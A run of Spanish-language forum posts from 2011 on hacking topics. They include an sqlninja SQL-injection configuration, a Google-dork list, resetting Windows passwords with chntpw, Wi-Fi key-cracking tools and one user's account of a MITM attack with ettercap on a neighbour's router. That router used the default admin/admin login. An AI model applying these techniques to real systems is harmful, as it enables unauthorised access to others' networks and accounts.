Pregunta: que modificar exactamente, y que poner, ya que solo sabemos el nombre (admin)

Este es el fragmento de codifgo que contiene un error

<form method="GET">
Usuario: <input type="text" name="usr">
Passwd: <input type="password" name="pass">
<input type="hidden" name="admin" value="0">
<input type="submit" value="Entrar" name="log">
<input type="submit" value="Registrarse" name="reg">
</form>


No se mucho de HTML, asi que yo entiendo que admin se identifica sin pass, y que se oculta el nombre de admin.

Estoy en lo cierto?

datos de la cookie:

name: PHPSESSID
valor:=f18e381*****59b14ab961f2*****
#35
Mundo Hacker TV da el salto a la pequeña pantalla de la mano de Telecinco y NOSOLOMUSICA

a las 04.00 hora española. Se que estarde, que podemos ver los capitulos en internet, pero me gusta que televisen esto.

;D
#36
Hacking / ayuda con sqninja 0.2.6
5 Agosto 2011, 00:09 AM
saludos a tos@s. me gustaria que me ayudaran, con un problemilla en la configuracion de esta herramienta, el problema es que estoy aprendiendo a usarala, pero el primer obstaculo me resulta complicado, y es que despues de hacer las modifocaciones que "creo" son las correctas, siempre me da como resultaado que no se puede injectar o que tengo un problema en la configuracion.
¿Como distinguir uno de otro?
este es mi sqlninja.conf:


Citar--httprequest_start--
POST http://www.objetivo.com/news.asp? HTTP/1.0
Host: www.OBJETIVO.com/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close

id=1;__SQL2INJECT__
--httprequest_end--

Citarlhost = 192.168.1.130


Citar# Interface to sniff when in backscan mode
device = wlna0

Citarmsfpath = /opt/MSF/trunk

Tambien comente las lineas del proxy, la IP y el PORT.

Estas son las modificaciones que tengo, y no se si es necesario hacer alguna mas.
#37
Hacking / 7000 dorks. Que los disfruten :-)))
2 Agosto 2011, 20:16 PM
Seguro que ya sabeis que es google dorks, son "como" pequeñas cagadas de configuracion,
configuraciones por defecto que dejan al aire informacion,... (si no es asi investigalo que te va gustar)
bueno , aqui teneis un adelanto de los 7000 que encontraresi en esta web, listos para descargar
para descargar.


http://pastebin.com/iAA7Ptnw


    ## 7,000 Dorks for hacking into various sites ##
     
    about.php?cartID=
    accinfo.php?cartId=
    acclogin.php?cartID=
    add.php?bookid=
    add_cart.php?num=
    addcart.php?
    addItem.php
    add-to-cart.php?ID=
    addToCart.php?idProduct=
    addtomylist.php?ProdId=
    adminEditProductFields.php?intProdID=
    advSearch_h.php?idCategory=
    affiliate.php?ID=
#38
En este tuto os mostrare como cambiar la pass de un usuario de windows usando linux (Ubuntu 10.04LTS).

En una terminal, instalmos chntpw:

Citarruben@CoYoTe:~$ sudo apt-get install chntpw
[sudo] password for ruben:
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes NUEVOS:
  chntpw
0 actualizados, 1 se instalarán, 0 para eliminar y 27 no actualizados.
Necesito descargar 57,0kB de archivos.
Se utilizarán 147kB de espacio de disco adicional después de esta operación.
AVISO: ¡No se han podido autenticar los siguientes paquetes!
  chntpw
¿Instalar estos paquetes sin verificación [s/N]? s
Des:1 http://es.archive.ubuntu.com/ubuntu/ lucid/universe chntpw 0.99.5-0+nmu1 [57,0kB]
Descargados 57,0kB en 1s (48,5kB/s)
Seleccionando el paquete chntpw previamente no seleccionado.
(Leyendo la base de datos ...  00%
.
.
.

Ahora montamos nuestra particion windows con permisos de lectura y escritura:

Citarsudo mount -t ntfs /dev/hdaX /mnt/windows

Entonces, necesitamos localizar el archivo SAM, que por defecto en los windows 7 y Xp se encuentra en:

windows/system32/config

una vez dentro del archivo 'config' en la terminal:

Citarruben@CoYoTe:~$ sudo chntpw -h ---> ayuda
ruben@CoYoTe:~$ sudo chntpw -l SAM ---> para listar los usuarios
ruben@CoYoTe:~$ sudo chntpw -U NombreUsuario SAM ---> resseta la pass


SIEMPRE RESETEAR LA PASS EN BLANCO




fuente: http://www.ubuntucommand.com/reset-windows-administrator-password/
#39
Pequeño tutorial para que vuestra maquina no responda  los ping solicitados:

normalmente se usa el comando ping (en linux y win2) para saber si una maquina esta conectada o no. Este comando envia un apquete a tu maquina, si esta conectada, envia una respuesta, el tiempo necesario para responder se llama "called ping" o tambien es conocido como "round-trip time"

El comando responde con tu IP si esta activo en caso contrario no responde y se entiende que esa IP no esta ocupada.

Para desactivar la respuesta:

Citarecho 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

para activar:

Citarecho 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all

Estos cambios los tines que realizar como root y cada vez que reinicies volverana su estado por defecto, esto es, que si respondera.

Para hacer los cambios de forma permanente:

vi /etc/sysctl.conf

y añadir esta linea

Citarnet.ipv4.conf.icmp_echo_ignore_all = 1




fuente: http://www.ubuntucommand.com/disable-icmp-ping-response/
#40
Saludos a todos, se que es un tema muy tocado, pero no encuentro la respuesta en el foro ni google.

Os pongo en situacion:

"sudo service mysql start
start: Job is already running: mysql
"

msf > db_driver
  •     Active Driver: postgresql
  •         Available: postgresql, mysql

    msf > db_driver mysql
  • Using database driver mysql
    msf > db_connect root:*******@127.0.0.1/msf3
    [-] Error while running command db_connect: Failed to connect to the database: Can't connect to MySQL server on '127.0.0.1' (110)

    Call stack:
    ./lib/msf/ui/console/command_dispatcher/db.rb:1827:in `db_connect_mysql'
    ./lib/msf/ui/console/command_dispatcher/db.rb:1710:in `send'
    ./lib/msf/ui/console/command_dispatcher/db.rb:1710:in `cmd_db_connect'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `send'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_command'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/dispatcher_shell.rb:338:in `run_single'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/dispatcher_shell.rb:332:in `each'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/dispatcher_shell.rb:332:in `run_single'
    /opt/framework-3.7.2/msf3/lib/rex/ui/text/shell.rb:198:in `run'
    ./msfconsole:130
    msf >

    Porque?? :huh:
#41
Foro Libre / dentro del router
21 Julio 2011, 22:19 PM
Empiezo diciendo que: se mira pero no se toca.

el otro dia se me dio por investigar en el router del vecino con telnet, este es el resultado.

http://www.youtube.com/watch?v=6pya7DpqKjs

no tengo conocimientos del manejo de routers asi que ando un poco perdido, todo empezo por que en un momento dado me quede sin salida a internet, solo podia acceder a los archivos compartidos, asi que decidi investigar por mi cuenta, no saque mucho en claro, salvo que pude capturar las pass y user de admin, claro que ya las conocia asi que solo tiene valor didactico.


herramienstas:

telnet --> para establecer conexion con el router, se podia hacer lo mismo desde el navegador (192.168.1.1) el user=admin y las pass=admin, estan por defecto un fallo grabe, pues no os imaginais cuanta gente no se molesta en cambiar las configuraciones por defecto de sus disposivos.

ettercap --> para realiza MITM (Man In The Middel) con esta herramienta los paquetes que mande la victima, (192.168.1.***) antes de llegar a su router (192.168.1.1) pasan por mi maquina (192.168.1.*) en google tenemos monton sobre este tema.

wiresharck --> para snifar el trafico de la red.

wifiauditor --> para descubrir la clave. (http://www.youtube.com/watch?v=9XUPv3AFjzA)

y la mas importante, una SHELL de linux.

:-)))
#42
el problema que tengo es que cuando inicio chrome, me sale una ventana diciendo que no se pueden leer mis preferencias, esto es incomodo, pues cada vez que configuras el navegador se pierde al cerrarlo.

La solucion es facil, tenemos que cambiar el propietario y el grupo del fichero de los siguientes archivos:

/home/USER/.config/google-chrome/Local\ State
/home/USER/.config/google-chrome/Default/Preferences

para cambiar el propietario y el grupo:
cd /home/USER/.config/google-chrome
sudo chown USER:GrupoUsuari Local\ State

cd Default
sudo chown USER:GrupoUsuari Preferences
#43
http://www.seguridadwireless.net/wpamagickey.php
y aquí para jazztel y tb wlan
http://www.seguridadwireless.net/wpamagickey1.php

es una locura, nunca fue tan fácil.
:-))

en este vídeo muestro lo mismo pero con la herramienta wifiauditor:
http://www.youtube.com/watch?v=9XUPv3AFjzA

;-) ;-)
#44
http://telehack.com/

Telehack es una simulación de la apaner/usenet de los años 1985-1990. Es una simulación multiusuario completa. Incluye 25000 servidores y BBSs de los principios de la red, miles de ficheros, una colección de juegos de aventuras, un intérprete de Basic junto a una librería de programas listos para ejecutarse, usuarios simulados, etc.

Puedes juguetear con este sistema desde el navegador o a través de telnet: telnet telehack.com

#45
He probado WIFIauditor, y tengo que decir que es la herramienta mas rápida, simple y facil de usar para sacar la pass de las redes wifi
os dejo una demostración de su rapidez en:   http://www.youtube.com/watch?v=9XUPv3AFjzA

para descargar:  http://www.4shared.com/file/zEeQntoR/WIFIAuditor.html